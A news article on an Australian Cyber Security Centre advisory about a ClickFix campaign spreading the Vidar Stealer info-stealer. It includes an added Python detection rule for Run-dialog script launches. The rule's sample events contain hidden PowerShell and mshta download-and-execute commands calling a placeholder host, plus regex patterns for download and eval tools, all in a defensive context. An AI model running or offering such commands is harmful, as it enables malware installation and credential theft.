Australia’s ACSC Sounds Alarm: ClickFix Campaign Unleashes Vidar Stealer on Organizations
Breaking: ACSC Warns of Active ClickFix Attacks Spreading Vidar Stealer
The Australian Cyber Security Centre (ACSC) has issued an urgent advisory about a sustained malware campaign that exploits the ClickFix social engineering technique to deliver the Vidar Stealer info-stealer. Organizations across Australia are urged to bolster defenses immediately.

“This is an active and evolving threat,” said an ACSC spokesperson. “We have observed multiple incidents where victims are tricked into executing malicious code disguised as routine troubleshooting steps.”
The campaign uses fake error messages or CAPTCHA prompts that instruct users to copy-paste commands, leading to installation of Vidar Stealer.
How ClickFix Works
Attackers display realistic pop-ups claiming the user must verify their identity. These pop-ups often mimic browser or security software alerts.
Victims are told to press a key combination – typically Windows Key + R or open a Run dialog – then paste a script. Once executed, the script downloads and runs the Vidar Stealer malware.
Vidar Stealer Capabilities
Vidar Stealer specializes in harvesting credentials, browser cookies, cryptocurrency wallets, and sensitive files. It exfiltrates data silently and can disable security tools.
“It’s a versatile weapon in the hands of cybercriminals,” explained Emma Tran, a cybersecurity analyst at CyberSafe Australia. “Once Vidar gains a foothold, it can rapidly steal information used for financial fraud and identity theft.”
The malware is often distributed through compromised websites, phishing emails, and malvertising.
Background
The ClickFix technique – also known as “fake error social engineering” – has been used by multiple threat actors since mid-2023. It preys on users’ willingness to follow instructions to resolve what appears to be a simple browser issue.
Vidar Stealer emerged around 2018 as an affordable Malware-as-a-Service (MaaS) on underground forums. It has been linked to several high-profile data breaches globally.
Australia has seen a surge in info-stealer attacks, prompting the ACSC to raise its threat level for critical infrastructure sectors.

What This Means
Organizations must treat any unsolicited browser alerts that request copy-paste actions as highly suspicious. End-user training is critical to recognize and resist these tactics.
“The best defense is user awareness,” said Tran. “If an alert asks you to run a script, it’s almost certainly malicious.”
IT security teams should restrict script execution, prevent PowerShell and cmd from running unsigned scripts, and implement application allowlisting. Immediate steps include:
- Disable Windows Script Host and Office macros unless absolutely needed.
- Use endpoint detection solutions with behavior analysis to catch Vidar Stealer.
- Audit remote access tools and restrict their use.
“Any organization that hasn’t updated its security awareness program should do so today,” the advisory states.
Recommendations for Organizations
- Employ multi-factor authentication on all critical accounts.
- Regularly back up data to offline or segregated storage.
- Monitor for suspicious Run dialog usage or command-line activity.
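The Run dialog chain described under “How ClickFix Works” gives defenders something concrete to monitor, which is what the last recommendation above asks for. The Python below is an added example, not code from the ACSC advisory or this article: it applies one detection rule (a script interpreter spawned by explorer.exe, the parent of anything typed into Win+R, whose command line carries download-and-execute cues) to constructed Sysmon-style process-creation records. The field names, sample paths and example.invalid URLs are assumptions made for the example.

```python
import re

# Interpreters a ClickFix lure typically has the victim paste a command into.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line cues for "fetch something remote and run it" behaviour.
CUES = {
    "remote_url": re.compile(r"https?://", re.I),
    "download": re.compile(r"\b(irm|iwr|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|curl|bitsadmin)\b", re.I),
    "inline_eval": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def assess_event(event: dict) -> list[str]:
    """Return the reasons an event looks like a ClickFix Run-dialog launch (empty = not flagged).

    Flag only when an interpreter was started by explorer.exe (the parent of anything run
    via Win+R) AND its command line carries at least one download/eval cue.
    """
    if basename(event["image"]) not in INTERPRETERS:
        return []
    if basename(event["parent"]) != "explorer.exe":
        return []
    cues = [name for name, rx in CUES.items() if rx.search(event["cmdline"])]
    return ["interpreter spawned by explorer.exe"] + cues if cues else []

def find_clickfix_candidates(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Run the rule over a batch of events; return (cmdline, reasons) for each hit."""
    return [(ev["cmdline"], r) for ev in events if (r := assess_event(ev))]

# Constructed Sysmon-style process-creation records for this example; not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (irm http://example.invalid/verify)"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://example.invalid/captcha.hta"},
    {"parent": r"C:\Program Files\Vendor\agent.exe",  # scheduled admin script: legitimate
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\inventory.ps1"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c ipconfig /all"},  # harmless command typed into Run: not flagged
]

if __name__ == "__main__":
    for cmdline, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"FLAGGED: {cmdline}\n  reasons: {', '.join(reasons)}")
```

The same rule maps directly onto a SIEM query over Sysmon Event ID 1 or Windows Security 4688 events, where ParentImage and CommandLine replace the dictionary fields used here.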
The ACSC encourages reporting any incidents via its online portal or by calling the 24/7 cyber hotline.
Reporting Channels
Organizations should submit indicators of compromise (IOCs) and any suspected intrusion to the ACSC. Timely reporting helps disrupt campaigns and protect others.